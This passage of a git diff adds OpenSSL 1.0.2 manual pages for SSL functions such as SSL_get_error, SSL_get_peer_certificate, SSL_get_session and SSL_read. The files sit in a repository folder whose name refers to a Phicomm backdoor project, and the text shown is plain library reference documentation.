+=item SSL_ERROR_WANT_CONNECT, SSL_ERROR_WANT_ACCEPT
+
+The operation did not complete; the same TLS/SSL I/O function should be
+called again later. The underlying BIO was not connected yet to the peer
+and the call would block in connect()/accept(). The SSL function should be
+called again when the connection is established. These messages can only
+appear with a BIO_s_connect() or BIO_s_accept() BIO, respectively.
+In order to find out, when the connection has been successfully established,
+on many platforms select() or poll() for writing on the socket file descriptor
+can be used.
+
+=item SSL_ERROR_WANT_X509_LOOKUP
+
+The operation did not complete because an application callback set by
+SSL_CTX_set_client_cert_cb() has asked to be called again.
+The TLS/SSL I/O function should be called again later.
+Details depend on the application.
+
+=item SSL_ERROR_SYSCALL
+
+Some I/O error occurred.  The OpenSSL error queue may contain more
+information on the error.  If the error queue is empty
+(i.e. ERR_get_error() returns 0), B<ret> can be used to find out more
+about the error: If B<ret == 0>, an EOF was observed that violates
+the protocol.  If B<ret == -1>, the underlying B<BIO> reported an
+I/O error (for socket I/O on Unix systems, consult B<errno> for details).
+
+=item SSL_ERROR_SSL
+
+A failure in the SSL library occurred, usually a protocol error.  The
+OpenSSL error queue contains more information on the error.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<err(3)|err(3)>
+
+=head1 HISTORY
+
+SSL_get_error() was added in SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_data_X509_STORE_CTX_idx.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_data_X509_STORE_CTX_idx.pod
new file mode 100644
index 0000000..165c6a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_data_X509_STORE_CTX_idx.pod
@@ -0,0 +1,61 @@
+=pod
+
+=head1 NAME
+
+SSL_get_ex_data_X509_STORE_CTX_idx - get ex_data index to access SSL structure
+from X509_STORE_CTX
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_get_ex_data_X509_STORE_CTX_idx(void);
+
+=head1 DESCRIPTION
+
+SSL_get_ex_data_X509_STORE_CTX_idx() returns the index number under which
+the pointer to the SSL object is stored into the X509_STORE_CTX object.
+
+=head1 NOTES
+
+Whenever a X509_STORE_CTX object is created for the verification of the
+peers certificate during a handshake, a pointer to the SSL object is
+stored into the X509_STORE_CTX object to identify the connection affected.
+To retrieve this pointer the X509_STORE_CTX_get_ex_data() function can
+be used with the correct index. This index is globally the same for all
+X509_STORE_CTX objects and can be retrieved using
+SSL_get_ex_data_X509_STORE_CTX_idx(). The index value is set when
+SSL_get_ex_data_X509_STORE_CTX_idx() is first called either by the application
+program directly or indirectly during other SSL setup functions or during
+the handshake.
+
+The value depends on other index values defined for X509_STORE_CTX objects
+before the SSL index is created.
+
+=head1 RETURN VALUES
+
+=over 4
+
+=item E<gt>=0
+
+The index value to access the pointer.
+
+=item E<lt>0
+
+An error occurred, check the error stack for a detailed error message.
+
+=back
+
+=head1 EXAMPLES
+
+The index returned from SSL_get_ex_data_X509_STORE_CTX_idx() allows to
+access the SSL object for the connection to be accessed during the
+verify_callback() when checking the peers certificate. Please check
+the example in L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>,
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>,
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_new_index.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_new_index.pod
new file mode 100644
index 0000000..228d23d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_ex_new_index.pod
@@ -0,0 +1,59 @@
+=pod
+
+=head1 NAME
+
+SSL_get_ex_new_index, SSL_set_ex_data, SSL_get_ex_data - internal application specific data functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_get_ex_new_index(long argl, void *argp,
+                CRYPTO_EX_new *new_func,
+                CRYPTO_EX_dup *dup_func,
+                CRYPTO_EX_free *free_func);
+
+ int SSL_set_ex_data(SSL *ssl, int idx, void *arg);
+
+ void *SSL_get_ex_data(const SSL *ssl, int idx);
+
+ typedef int new_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef void free_func(void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                int idx, long argl, void *argp);
+ typedef int dup_func(CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from, void *from_d,
+                int idx, long argl, void *argp);
+
+=head1 DESCRIPTION
+
+Several OpenSSL structures can have application specific data attached to them.
+These functions are used internally by OpenSSL to manipulate application
+specific data attached to a specific structure.
+
+SSL_get_ex_new_index() is used to register a new index for application
+specific data.
+
+SSL_set_ex_data() is used to store application data at B<arg> for B<idx> into
+the B<ssl> object.
+
+SSL_get_ex_data() is used to retrieve the information for B<idx> from
+B<ssl>.
+
+A detailed description for the B<*_get_ex_new_index()> functionality
+can be found in L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>.
+The B<*_get_ex_data()> and B<*_set_ex_data()> functionality is described in
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>.
+
+=head1 EXAMPLES
+
+An example on how to use the functionality is included in the example
+verify_callback() in L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<RSA_get_ex_new_index(3)|RSA_get_ex_new_index(3)>,
+L<CRYPTO_set_ex_data(3)|CRYPTO_set_ex_data(3)>,
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_fd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_fd.pod
new file mode 100644
index 0000000..89260b5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_fd.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+SSL_get_fd - get file descriptor linked to an SSL object
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_get_fd(const SSL *ssl);
+ int SSL_get_rfd(const SSL *ssl);
+ int SSL_get_wfd(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_fd() returns the file descriptor which is linked to B<ssl>.
+SSL_get_rfd() and SSL_get_wfd() return the file descriptors for the
+read or the write channel, which can be different. If the read and the
+write channel are different, SSL_get_fd() will return the file descriptor
+of the read channel.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item -1
+
+The operation failed, because the underlying BIO is not of the correct type
+(suitable for file descriptors).
+
+=item E<gt>=0
+
+The file descriptor linked to B<ssl>.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_set_fd(3)|SSL_set_fd(3)>, L<ssl(3)|ssl(3)> , L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_cert_chain.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_cert_chain.pod
new file mode 100644
index 0000000..059376c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_cert_chain.pod
@@ -0,0 +1,52 @@
+=pod
+
+=head1 NAME
+
+SSL_get_peer_cert_chain - get the X509 certificate chain of the peer
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ STACK_OF(X509) *SSL_get_peer_cert_chain(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_peer_cert_chain() returns a pointer to STACK_OF(X509) certificates
+forming the certificate chain of the peer. If called on the client side,
+the stack also contains the peer's certificate; if called on the server
+side, the peer's certificate must be obtained separately using
+L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>.
+If the peer did not present a certificate, NULL is returned.
+
+=head1 NOTES
+
+The peer certificate chain is not necessarily available after reusing
+a session, in which case a NULL pointer is returned.
+
+The reference count of the STACK_OF(X509) object is not incremented.
+If the corresponding session is freed, the pointer must not be used
+any longer.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+No certificate was presented by the peer or no connection was established
+or the certificate chain is no longer available when a session is reused.
+
+=item Pointer to a STACK_OF(X509)
+
+The return value points to the certificate chain presented by the peer.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_certificate.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_certificate.pod
new file mode 100644
index 0000000..ef7c8be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_peer_certificate.pod
@@ -0,0 +1,55 @@
+=pod
+
+=head1 NAME
+
+SSL_get_peer_certificate - get the X509 certificate of the peer
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ X509 *SSL_get_peer_certificate(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_peer_certificate() returns a pointer to the X509 certificate the
+peer presented. If the peer did not present a certificate, NULL is returned.
+
+=head1 NOTES
+
+Due to the protocol definition, a TLS/SSL server will always send a
+certificate, if present. A client will only send a certificate when
+explicitly requested to do so by the server (see
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>). If an anonymous cipher
+is used, no certificates are sent.
+
+That a certificate is returned does not indicate information about the
+verification state, use L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>
+to check the verification state.
+
+The reference count of the X509 object is incremented by one, so that it
+will not be destroyed when the session containing the peer certificate is
+freed. The X509 object must be explicitly freed using X509_free().
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+No certificate was presented by the peer or no connection was established.
+
+=item Pointer to an X509 certificate
+
+The return value points to the certificate presented by the peer.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_get_verify_result(3)|SSL_get_verify_result(3)>,
+L<SSL_CTX_set_verify(3)|SSL_CTX_set_verify(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_psk_identity.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_psk_identity.pod
new file mode 100644
index 0000000..fe62916
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_psk_identity.pod
@@ -0,0 +1,63 @@
+=pod
+
+=begin comment
+
+Copyright 2005 Nokia. All rights reserved.
+
+The portions of the attached software ("Contribution") is developed by
+Nokia Corporation and is licensed pursuant to the OpenSSL open source
+license.
+
+The Contribution, originally written by Mika Kousa and Pasi Eronen of
+Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+support (see RFC 4279) to OpenSSL.
+
+No patent licenses or other rights except those expressly stated in
+the OpenSSL open source license shall be deemed granted or received
+expressly, by implication, estoppel, or otherwise.
+
+No assurances are provided by Nokia that the Contribution does not
+infringe the patent or other intellectual property rights of any third
+party or that the license provides you with all the necessary rights
+to make use of the Contribution.
+
+THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+OTHERWISE.
+
+=end comment
+
+=head1 NAME
+
+SSL_get_psk_identity, SSL_get_psk_identity_hint - get PSK client identity and hint
+
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_get_psk_identity_hint(const SSL *ssl);
+ const char *SSL_get_psk_identity(const SSL *ssl);
+
+
+=head1 DESCRIPTION
+
+SSL_get_psk_identity_hint() is used to retrieve the PSK identity hint
+used during the connection setup related to SSL object
+B<ssl>. Similarly, SSL_get_psk_identity() is used to retrieve the PSK
+identity used during the connection setup.
+
+
+=head1 RETURN VALUES
+
+If non-B<NULL>, SSL_get_psk_identity_hint() returns the PSK identity
+hint and SSL_get_psk_identity() returns the PSK identity. Both are
+B<NULL>-terminated. SSL_get_psk_identity_hint() may return B<NULL> if
+no PSK identity hint was used during the connection setup.
+
+Note that the return value is valid only during the lifetime of the
+SSL object B<ssl>.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_rbio.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_rbio.pod
new file mode 100644
index 0000000..3d98233
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_rbio.pod
@@ -0,0 +1,40 @@
+=pod
+
+=head1 NAME
+
+SSL_get_rbio - get BIO linked to an SSL object
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ BIO *SSL_get_rbio(SSL *ssl);
+ BIO *SSL_get_wbio(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_rbio() and SSL_get_wbio() return pointers to the BIOs for the
+read or the write channel, which can be different. The reference count
+of the BIO is not incremented.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+No BIO was connected to the SSL object
+
+=item Any other pointer
+
+The BIO linked to B<ssl>.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_set_bio(3)|SSL_set_bio(3)>, L<ssl(3)|ssl(3)> , L<bio(3)|bio(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_session.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_session.pod
new file mode 100644
index 0000000..0c41caa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_session.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+SSL_get_session - retrieve TLS/SSL session data
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_SESSION *SSL_get_session(const SSL *ssl);
+ SSL_SESSION *SSL_get0_session(const SSL *ssl);
+ SSL_SESSION *SSL_get1_session(SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_session() returns a pointer to the B<SSL_SESSION> actually used in
+B<ssl>. The reference count of the B<SSL_SESSION> is not incremented, so
+that the pointer can become invalid by other operations.
+
+SSL_get0_session() is the same as SSL_get_session().
+
+SSL_get1_session() is the same as SSL_get_session(), but the reference
+count of the B<SSL_SESSION> is incremented by one.
+
+=head1 NOTES
+
+The ssl session contains all information required to re-establish the
+connection without a new handshake.
+
+SSL_get0_session() returns a pointer to the actual session. As the
+reference counter is not incremented, the pointer is only valid while
+the connection is in use. If L<SSL_clear(3)|SSL_clear(3)> or
+L<SSL_free(3)|SSL_free(3)> is called, the session may be removed completely
+(if considered bad), and the pointer obtained will become invalid. Even
+if the session is valid, it can be removed at any time due to timeout
+during L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>.
+
+If the data is to be kept, SSL_get1_session() will increment the reference
+count, so that the session will not be implicitly removed by other operations
+but stays in memory. In order to remove the session
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)> must be explicitly called once
+to decrement the reference count again.
+
+SSL_SESSION objects keep internal link information about the session cache
+list, when being inserted into one SSL_CTX object's session cache.
+One SSL_SESSION object, regardless of its reference count, must therefore
+only be used with one SSL_CTX object (and the SSL objects created
+from this SSL_CTX object).
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+There is no session available in B<ssl>.
+
+=item Pointer to an SSL
+
+The return value points to the data of an SSL session.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_free(3)|SSL_free(3)>,
+L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_verify_result.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_verify_result.pod
new file mode 100644
index 0000000..55b56a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_verify_result.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+SSL_get_verify_result - get result of peer certificate verification
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ long SSL_get_verify_result(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_verify_result() returns the result of the verification of the
+X509 certificate presented by the peer, if any.
+
+=head1 NOTES
+
+SSL_get_verify_result() can only return one error code while the verification
+of a certificate can fail because of many reasons at the same time. Only
+the last verification error that occurred during the processing is available
+from SSL_get_verify_result().
+
+The verification result is part of the established session and is restored
+when a session is reused.
+
+=head1 BUGS
+
+If no peer certificate was presented, the returned result code is
+X509_V_OK. This is because no verification error occurred, it does however
+not indicate success. SSL_get_verify_result() is only useful in connection
+with L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>.
+
+=head1 RETURN VALUES
+
+The following return values can currently occur:
+
+=over 4
+
+=item X509_V_OK
+
+The verification succeeded or no peer certificate was presented.
+
+=item Any other value
+
+Documented in L<verify(1)|verify(1)>.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_set_verify_result(3)|SSL_set_verify_result(3)>,
+L<SSL_get_peer_certificate(3)|SSL_get_peer_certificate(3)>,
+L<verify(1)|verify(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_version.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_version.pod
new file mode 100644
index 0000000..9ae6f25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_get_version.pod
@@ -0,0 +1,54 @@
+=pod
+
+=head1 NAME
+
+SSL_get_version - get the protocol version of a connection.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ const char *SSL_get_version(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_get_version() returns the name of the protocol used for the
+connection B<ssl>.
+
+=head1 RETURN VALUES
+
+The following strings can be returned:
+
+=over 4
+
+=item SSLv2
+
+The connection uses the SSLv2 protocol.
+
+=item SSLv3
+
+The connection uses the SSLv3 protocol.
+
+=item TLSv1
+
+The connection uses the TLSv1.0 protocol.
+
+=item TLSv1.1
+
+The connection uses the TLSv1.1 protocol.
+
+=item TLSv1.2
+
+The connection uses the TLSv1.2 protocol.
+
+=item unknown
+
+This indicates that no version has been set (no connection established).
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_library_init.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_library_init.pod
new file mode 100644
index 0000000..8766776
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_library_init.pod
@@ -0,0 +1,57 @@
+=pod
+
+=head1 NAME
+
+SSL_library_init, OpenSSL_add_ssl_algorithms, SSLeay_add_ssl_algorithms
+- initialize SSL library by registering algorithms
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_library_init(void);
+ #define OpenSSL_add_ssl_algorithms()    SSL_library_init()
+ #define SSLeay_add_ssl_algorithms()     SSL_library_init()
+
+=head1 DESCRIPTION
+
+SSL_library_init() registers the available SSL/TLS ciphers and digests.
+
+OpenSSL_add_ssl_algorithms() and SSLeay_add_ssl_algorithms() are synonyms
+for SSL_library_init().
+
+=head1 NOTES
+
+SSL_library_init() must be called before any other action takes place.
+SSL_library_init() is not reentrant. 
+
+=head1 WARNING
+
+SSL_library_init() adds ciphers and digests used directly and indirectly by
+SSL/TLS.
+
+=head1 EXAMPLES
+
+A typical TLS/SSL application will start with the library initialization,
+and provide readable error messages.
+
+ SSL_load_error_strings();                /* readable error messages */
+ SSL_library_init();                      /* initialize library */
+
+=head1 RETURN VALUES
+
+SSL_library_init() always returns "1", so it is safe to discard the return
+value.
+
+=head1 NOTES
+
+OpenSSL 0.9.8o and 1.0.0a and later added SHA2 algorithms to SSL_library_init().
+Applications which need to use SHA2 in earlier versions of OpenSSL should call
+OpenSSL_add_all_algorithms() as well.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_load_error_strings(3)|SSL_load_error_strings(3)>,
+L<RAND_add(3)|RAND_add(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_load_client_CA_file.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_load_client_CA_file.pod
new file mode 100644
index 0000000..02527dc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_load_client_CA_file.pod
@@ -0,0 +1,62 @@
+=pod
+
+=head1 NAME
+
+SSL_load_client_CA_file - load certificate names from file
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ STACK_OF(X509_NAME) *SSL_load_client_CA_file(const char *file);
+
+=head1 DESCRIPTION
+
+SSL_load_client_CA_file() reads certificates from B<file> and returns
+a STACK_OF(X509_NAME) with the subject names found.
+
+=head1 NOTES
+
+SSL_load_client_CA_file() reads a file of PEM formatted certificates and
+extracts the X509_NAMES of the certificates found. While the name suggests
+the specific usage as support function for
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>,
+it is not limited to CA certificates.
+
+=head1 EXAMPLES
+
+Load names of CAs from file and use it as a client CA list:
+
+ SSL_CTX *ctx;
+ STACK_OF(X509_NAME) *cert_names;
+
+ ... 
+ cert_names = SSL_load_client_CA_file("/path/to/CAfile.pem");
+ if (cert_names != NULL)
+   SSL_CTX_set_client_CA_list(ctx, cert_names);
+ else
+   error_handling();
+ ...
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+The operation failed, check out the error stack for the reason.
+
+=item Pointer to STACK_OF(X509_NAME)
+
+Pointer to the subject names of the successfully read certificates.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>,
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_new.pod
new file mode 100644
index 0000000..25300e9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_new.pod
@@ -0,0 +1,44 @@
+=pod
+
+=head1 NAME
+
+SSL_new - create a new SSL structure for a connection
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL *SSL_new(SSL_CTX *ctx);
+
+=head1 DESCRIPTION
+
+SSL_new() creates a new B<SSL> structure which is needed to hold the
+data for a TLS/SSL connection. The new structure inherits the settings
+of the underlying context B<ctx>: connection method (SSLv2/v3/TLSv1),
+options, verification settings, timeout settings.
+
+=head1 RETURN VALUES
+
+The following return values can occur:
+
+=over 4
+
+=item NULL
+
+The creation of a new SSL structure failed. Check the error stack to
+find out the reason.
+
+=item Pointer to an SSL structure
+
+The return value points to an allocated SSL structure.
+
+=back
+
+=head1 SEE ALSO
+
+L<SSL_free(3)|SSL_free(3)>, L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_CTX_set_options(3)|SSL_CTX_set_options(3)>,
+L<SSL_get_SSL_CTX(3)|SSL_get_SSL_CTX(3)>,
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_pending.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_pending.pod
new file mode 100644
index 0000000..43f2874
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_pending.pod
@@ -0,0 +1,43 @@
+=pod
+
+=head1 NAME
+
+SSL_pending - obtain number of readable bytes buffered in an SSL object
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_pending(const SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_pending() returns the number of bytes which are available inside
+B<ssl> for immediate read.
+
+=head1 NOTES
+
+Data are received in blocks from the peer. Therefore data can be buffered
+inside B<ssl> and are ready for immediate retrieval with
+L<SSL_read(3)|SSL_read(3)>.
+
+=head1 RETURN VALUES
+
+The number of bytes pending is returned.
+
+=head1 BUGS
+
+SSL_pending() takes into account only bytes from the TLS/SSL record
+that is currently being processed (if any).  If the B<SSL> object's
+I<read_ahead> flag is set, additional protocol bytes may have been
+read containing more TLS/SSL records; these are ignored by
+SSL_pending().
+
+Up to OpenSSL 0.9.6, SSL_pending() does not check if the record type
+of pending data is application data.
+
+=head1 SEE ALSO
+
+L<SSL_read(3)|SSL_read(3)>, L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_read.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_read.pod
new file mode 100644
index 0000000..8ca0ce5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_read.pod
@@ -0,0 +1,124 @@
+=pod
+
+=head1 NAME
+
+SSL_read - read bytes from a TLS/SSL connection.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_read(SSL *ssl, void *buf, int num);
+
+=head1 DESCRIPTION
+
+SSL_read() tries to read B<num> bytes from the specified B<ssl> into the
+buffer B<buf>.
+
+=head1 NOTES
+
+If necessary, SSL_read() will negotiate a TLS/SSL session, if
+not already explicitly performed by L<SSL_connect(3)|SSL_connect(3)> or
+L<SSL_accept(3)|SSL_accept(3)>. If the
+peer requests a re-negotiation, it will be performed transparently during
+the SSL_read() operation. The behaviour of SSL_read() depends on the
+underlying BIO. 
+
+For the transparent negotiation to succeed, the B<ssl> must have been
+initialized to client or server mode. This is being done by calling
+L<SSL_set_connect_state(3)|SSL_set_connect_state(3)> or SSL_set_accept_state()
+before the first call to an SSL_read() or L<SSL_write(3)|SSL_write(3)>
+function.
+
+SSL_read() works based on the SSL/TLS records. The data are received in
+records (with a maximum record size of 16kB for SSLv3/TLSv1). Only when a
+record has been completely received, it can be processed (decryption and
+check of integrity). Therefore data that was not retrieved at the last
+call of SSL_read() can still be buffered inside the SSL layer and will be
+retrieved on the next call to SSL_read(). If B<num> is higher than the
+number of bytes buffered, SSL_read() will return with the bytes buffered.
+If no more bytes are in the buffer, SSL_read() will trigger the processing
+of the next record. Only when the record has been received and processed
+completely, SSL_read() will return reporting success. At most the contents
+of the record will be returned. As the size of an SSL/TLS record may exceed
+the maximum packet size of the underlying transport (e.g. TCP), it may
+be necessary to read several packets from the transport layer before the
+record is complete and SSL_read() can succeed.
+
+If the underlying BIO is B<blocking>, SSL_read() will only return, once the
+read operation has been finished or an error occurred, except when a
+renegotiation take place, in which case a SSL_ERROR_WANT_READ may occur. 
+This behaviour can be controlled with the SSL_MODE_AUTO_RETRY flag of the
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)> call.
+
+If the underlying BIO is B<non-blocking>, SSL_read() will also return
+when the underlying BIO could not satisfy the needs of SSL_read()
+to continue the operation. In this case a call to
+L<SSL_get_error(3)|SSL_get_error(3)> with the
+return value of SSL_read() will yield B<SSL_ERROR_WANT_READ> or
+B<SSL_ERROR_WANT_WRITE>. As at any time a re-negotiation is possible, a
+call to SSL_read() can also cause write operations! The calling process
+then must repeat the call after taking appropriate action to satisfy the
+needs of SSL_read(). The action depends on the underlying BIO. When using a
+non-blocking socket, nothing is to be done, but select() can be used to check
+for the required condition. When using a buffering BIO, like a BIO pair, data
+must be written into or retrieved out of the BIO before being able to continue.
+
+L<SSL_pending(3)|SSL_pending(3)> can be used to find out whether there
+are buffered bytes available for immediate retrieval. In this case
+SSL_read() can be called without blocking or actually receiving new
+data from the underlying socket.
+
+=head1 WARNING
+
+When an SSL_read() operation has to be repeated because of
+B<SSL_ERROR_WANT_READ> or B<SSL_ERROR_WANT_WRITE>, it must be repeated
